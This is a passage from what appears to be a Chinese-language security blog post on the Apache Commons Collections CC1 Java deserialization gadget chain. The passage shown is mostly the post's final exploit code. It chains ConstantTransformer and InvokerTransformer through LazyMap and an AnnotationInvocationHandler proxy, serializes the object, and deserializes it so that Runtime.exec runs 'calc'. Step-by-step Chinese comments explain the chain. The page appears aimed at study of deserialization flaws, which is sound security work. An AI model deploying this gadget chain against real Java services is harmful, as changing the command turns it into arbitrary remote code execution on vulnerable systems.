<pre class="astro-code github-dark-dimmed" style="background-color:#22272e;color:#adbac7; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="java"><code><span class="line"><span style="color:#F47067">package</span><span style="color:#ADBAC7"> cat.uwu.serialize;</span></span>
<span class="line"></span>
<span class="line"><span style="color:#F47067">import</span><span style="color:#ADBAC7"> org.apache.commons.collections.Transformer;</span></span>
<span class="line"><span style="color:#F47067">import</span><span style="color:#ADBAC7"> org.apache.commons.collections.functors.ChainedTransformer;</span></span>
<span class="line"><span style="color:#F47067">import</span><span style="color:#ADBAC7"> org.apache.commons.collections.functors.ConstantTransformer;</span></span>
<span class="line"><span style="color:#F47067">import</span><span style="color:#ADBAC7"> org.apache.commons.collections.functors.InvokerTransformer;</span></span>
<span class="line"><span style="color:#F47067">import</span><span style="color:#ADBAC7"> org.apache.commons.collections.map.LazyMap;</span></span>
<span class="line"><span style="color:#F47067">import</span><span style="color:#ADBAC7"> cat.uwu.util.SerializeUtils;</span></span>
<span class="line"></span>
<span class="line"><span style="color:#F47067">import</span><span style="color:#ADBAC7"> java.lang.reflect.Constructor;</span></span>
<span class="line"><span style="color:#F47067">import</span><span style="color:#ADBAC7"> java.lang.reflect.InvocationHandler;</span></span>
<span class="line"><span style="color:#F47067">import</span><span style="color:#ADBAC7"> java.lang.reflect.Proxy;</span></span>
<span class="line"><span style="color:#F47067">import</span><span style="color:#ADBAC7"> java.util.HashMap;</span></span>
<span class="line"><span style="color:#F47067">import</span><span style="color:#ADBAC7"> java.util.Map;</span></span>
<span class="line"></span>
<span class="line"><span style="color:#F47067">public</span><span style="color:#F47067"> class</span><span style="color:#F69D50"> CommonsCollections1Chain</span><span style="color:#ADBAC7"> {</span></span>
<span class="line"></span>
<span class="line"><span style="color:#F47067">    public</span><span style="color:#F47067"> static</span><span style="color:#F47067"> void</span><span style="color:#DCBDFB"> main</span><span style="color:#ADBAC7">(</span><span style="color:#F47067">String</span><span style="color:#ADBAC7">[] </span><span style="color:#F69D50">args</span><span style="color:#ADBAC7">) </span><span style="color:#F47067">throws</span><span style="color:#ADBAC7"> Exception {</span></span>
<span class="line"></span>
<span class="line"><span style="color:#768390">        // 创建一个Transformer数组，用于构建命令执行链</span></span>
<span class="line"><span style="color:#768390">        // ConstantTransformer：将一个常量（这里是Runtime.class）作为transformer的输出</span></span>
<span class="line"><span style="color:#768390">        // InvokerTransformer：调用指定的方法，依次执行getMethod("getRuntime")、invoke()、exec("calc")</span></span>
<span class="line"><span style="color:#F47067">        Transformer</span><span style="color:#F69D50">[] </span><span style="color:#ADBAC7">transformers</span><span style="color:#F47067"> =</span><span style="color:#F47067"> new</span><span style="color:#F47067"> Transformer</span><span style="color:#ADBAC7">[]{</span></span>
<span class="line"><span style="color:#F47067">                new</span><span style="color:#DCBDFB"> ConstantTransformer</span><span style="color:#ADBAC7">(Runtime.class), </span><span style="color:#768390">// 第一步：将Runtime.class作为常量返回</span></span>
<span class="line"><span style="color:#F47067">                new</span><span style="color:#DCBDFB"> InvokerTransformer</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"getMethod"</span><span style="color:#ADBAC7">, </span><span style="color:#F47067">new</span><span style="color:#F47067"> Class</span><span style="color:#ADBAC7">[]{String.class, </span><span style="color:#F47067">Class</span><span style="color:#ADBAC7">[].class}, </span><span style="color:#F47067">new</span><span style="color:#F47067"> Object</span><span style="color:#ADBAC7">[]{</span><span style="color:#96D0FF">"getRuntime"</span><span style="color:#ADBAC7">, </span><span style="color:#6CB6FF">null</span><span style="color:#ADBAC7">}), </span><span style="color:#768390">// 第二步：获取Runtime类的getRuntime方法</span></span>
<span class="line"><span style="color:#F47067">                new</span><span style="color:#DCBDFB"> InvokerTransformer</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"invoke"</span><span style="color:#ADBAC7">, </span><span style="color:#F47067">new</span><span style="color:#F47067"> Class</span><span style="color:#ADBAC7">[]{Object.class, </span><span style="color:#F47067">Object</span><span style="color:#ADBAC7">[].class}, </span><span style="color:#F47067">new</span><span style="color:#F47067"> Object</span><span style="color:#ADBAC7">[]{</span><span style="color:#6CB6FF">null</span><span style="color:#ADBAC7">, </span><span style="color:#6CB6FF">null</span><span style="color:#ADBAC7">}), </span><span style="color:#768390">// 第三步：调用getRuntime方法获取Runtime实例</span></span>
<span class="line"><span style="color:#F47067">                new</span><span style="color:#DCBDFB"> InvokerTransformer</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"exec"</span><span style="color:#ADBAC7">, </span><span style="color:#F47067">new</span><span style="color:#F47067"> Class</span><span style="color:#ADBAC7">[]{String.class}, </span><span style="color:#F47067">new</span><span style="color:#F47067"> Object</span><span style="color:#ADBAC7">[]{</span><span style="color:#96D0FF">"calc"</span><span style="color:#ADBAC7">}) </span><span style="color:#768390">// 第四步：调用exec方法执行系统命令（这里是calc）</span></span>
<span class="line"><span style="color:#ADBAC7">        };</span></span>
<span class="line"></span>
<span class="line"><span style="color:#768390">        // 将多个Transformer链在一起，按顺序执行transform方法</span></span>
<span class="line"><span style="color:#ADBAC7">        ChainedTransformer</span><span style="color:#ADBAC7"> chainedTransformer</span><span style="color:#F47067"> =</span><span style="color:#F47067"> new</span><span style="color:#DCBDFB"> ChainedTransformer</span><span style="color:#ADBAC7">(transformers);</span></span>
<span class="line"></span>
<span class="line"><span style="color:#768390">        // 创建一个HashMap用于LazyMap装饰</span></span>
<span class="line"><span style="color:#ADBAC7">        HashMap</span><span style="color:#F69D50">&#x3C;</span><span style="color:#F47067">Object</span><span style="color:#F69D50">, </span><span style="color:#F47067">Object</span><span style="color:#F69D50">> </span><span style="color:#ADBAC7">hashMap</span><span style="color:#F47067"> =</span><span style="color:#F47067"> new</span><span style="color:#ADBAC7"> HashMap&#x3C;>();</span></span>
<span class="line"></span>
<span class="line"><span style="color:#768390">        // 使用LazyMap装饰HashMap，将chainedTransformer作为factory</span></span>
<span class="line"><span style="color:#768390">        // LazyMap的get方法在key不存在时会触发transformer链</span></span>
<span class="line"><span style="color:#ADBAC7">        Map</span><span style="color:#ADBAC7"> decorateMap</span><span style="color:#F47067"> =</span><span style="color:#ADBAC7"> LazyMap.</span><span style="color:#DCBDFB">decorate</span><span style="color:#ADBAC7">(hashMap, chainedTransformer);</span></span>
<span class="line"></span>
<span class="line"><span style="color:#768390">        // 获取AnnotationInvocationHandler类的构造函数，用于后续动态代理</span></span>
<span class="line"><span style="color:#ADBAC7">        Class</span><span style="color:#ADBAC7"> c</span><span style="color:#F47067"> =</span><span style="color:#ADBAC7"> Class.</span><span style="color:#DCBDFB">forName</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"sun.reflect.annotation.AnnotationInvocationHandler"</span><span style="color:#ADBAC7">);</span></span>
<span class="line"><span style="color:#ADBAC7">        Constructor</span><span style="color:#ADBAC7"> annotationInvocationConstructor</span><span style="color:#F47067"> =</span><span style="color:#ADBAC7"> c.</span><span style="color:#DCBDFB">getDeclaredConstructor</span><span style="color:#ADBAC7">(Class.class, Map.class);</span></span>
<span class="line"><span style="color:#ADBAC7">        annotationInvocationConstructor.</span><span style="color:#DCBDFB">setAccessible</span><span style="color:#ADBAC7">(</span><span style="color:#6CB6FF">true</span><span style="color:#ADBAC7">); </span><span style="color:#768390">// 由于构造函数是私有的，使用setAccessible进行访问控制</span></span>
<span class="line"></span>
<span class="line"><span style="color:#768390">        // 创建AnnotationInvocationHandler实例，将Override.class和LazyMap作为参数传入</span></span>
<span class="line"><span style="color:#ADBAC7">        InvocationHandler</span><span style="color:#ADBAC7"> handler</span><span style="color:#F47067"> =</span><span style="color:#ADBAC7"> (InvocationHandler) annotationInvocationConstructor.</span><span style="color:#DCBDFB">newInstance</span><span style="color:#ADBAC7">(Override.class, decorateMap);</span></span>
<span class="line"></span>
<span class="line"><span style="color:#768390">        // 创建动态代理，代理Map接口</span></span>
<span class="line"><span style="color:#768390">        // 当通过代理对象调用方法时，会触发AnnotationInvocationHandler的invoke方法</span></span>
<span class="line"><span style="color:#ADBAC7">        Map</span><span style="color:#ADBAC7"> proxyMap</span><span style="color:#F47067"> =</span><span style="color:#ADBAC7"> (Map) Proxy.</span><span style="color:#DCBDFB">newProxyInstance</span><span style="color:#ADBAC7">(ClassLoader.</span><span style="color:#DCBDFB">getSystemClassLoader</span><span style="color:#ADBAC7">(), </span><span style="color:#F47067">new</span><span style="color:#F47067"> Class</span><span style="color:#ADBAC7">[]{Map.class}, handler);</span></span>
<span class="line"></span>
<span class="line"><span style="color:#768390">        // 再次使用AnnotationInvocationHandler创建一个新的实例</span></span>
<span class="line"><span style="color:#768390">        // 这里传入的proxyMap将在反序列化时触发LazyMap的get方法，从而执行命令</span></span>
<span class="line"><span style="color:#ADBAC7">        Object</span><span style="color:#ADBAC7"> o</span><span style="color:#F47067"> =</span><span style="color:#ADBAC7"> annotationInvocationConstructor.</span><span style="color:#DCBDFB">newInstance</span><span style="color:#ADBAC7">(Override.class, proxyMap);</span></span>
<span class="line"></span>
<span class="line"><span style="color:#768390">        // 序列化构造的恶意对象，保存到文件中</span></span>
<span class="line"><span style="color:#ADBAC7">        SerializeUtils.</span><span style="color:#DCBDFB">serialize</span><span style="color:#ADBAC7">(o);</span></span>
<span class="line"></span>
<span class="line"><span style="color:#768390">        // 反序列化恶意对象，触发命令执行</span></span>
<span class="line"><span style="color:#ADBAC7">        SerializeUtils.</span><span style="color:#DCBDFB">unserialize</span><span style="color:#ADBAC7">(</span><span style="color:#96D0FF">"ser.bin"</span><span style="color:#ADBAC7">);</span></span>
<span class="line"><span style="color:#ADBAC7">    }</span></span>
<span class="line"><span style="color:#ADBAC7">}</span></span></code></pre>  </div> <aside class="hidden md:block"> <nav class="sticky top-24 text-sm"><p class="mb-3 font-mono text-xs uppercase tracking-wider text-muted-light dark:text-muted-dark">
on this page
</p><ul class="space-y-2 border-l border-border-light dark:border-border-dark"><li><a href="#环境配置" class="-ml-px block border-l border-transparent pl-4 transition-colors hover:border-fg-light dark:hover:border-fg-dark hover:text-fg-light dark:hover:text-fg-dark">环境配置</a></li><li><a href="#runtimeexec" class="-ml-px block border-l border-transparent pl-4 transition-colors hover:border-fg-light dark:hover:border-fg-dark hover:text-fg-light dark:hover:text-fg-dark">Runtime.exec</a></li><li><a href="#invokertransformertransform" class="-ml-px block border-l border-transparent pl-4 transition-colors hover:border-fg-light dark:hover:border-fg-dark hover:text-fg-light dark:hover:text-fg-dark">InvokerTransformer.transform()</a></li><li><a href="#lazymapget" class="-ml-px block border-l border-transparent pl-4 transition-colors hover:border-fg-light dark:hover:border-fg-dark hover:text-fg-light dark:hover:text-fg-dark">LazyMap.get()</a></li><li><a href="#annotationinvocationhandlerinvoke" class="-ml-px block border-l border-transparent pl-4 transition-colors hover:border-fg-light dark:hover:border-fg-dark hover:text-fg-light dark:hover:text-fg-dark">AnnotationInvocationHandler.invoke()</a></li><li><a href="#constanttransformerchainedtransformer" class="-ml-px block border-l border-transparent pl-4 transition-colors hover:border-fg-light dark:hover:border-fg-dark hover:text-fg-light dark:hover:text-fg-dark">ConstantTransformer&amp;&amp;ChainedTransformer</a></li><li><a href="#最终exp" class="-ml-px block border-l border-transparent pl-4 transition-colors hover:border-fg-light dark:hover:border-fg-dark hover:text-fg-light dark:hover:text-fg-dark">最终exp</a></li></ul></nav> </aside> </div> <footer class="mt-16 border-t border-border-light dark:border-border-dark pt-8 text-sm text-muted-light dark:text-muted-dark"> <a href="/blog" class="hover:text-fg-light dark:hover:text-fg-dark">← back to blog</a> </footer> </article>  </main> <footer class="border-t border-border-light dark:border-border-dark"> <div class="mx-auto flex w-full max-w-6xl flex-col items-start justify-between gap-3 px-6 py-8 text-sm text-muted-light dark:text-muted-dark md:flex-row md:items-center"> <p>
© 2026 oSthing. built with Astro.
</p> <p class="font-mono text-xs"> <a href="/rss.xml" class="hover:text-fg-light dark:hover:text-fg-dark">rss</a> <span class="mx-2 opacity-50">·</span> <a href="/sitemap.xml" class="hover:text-fg-light dark:hover:text-fg-dark">sitemap</a> </p> </div> </footer> </body></html>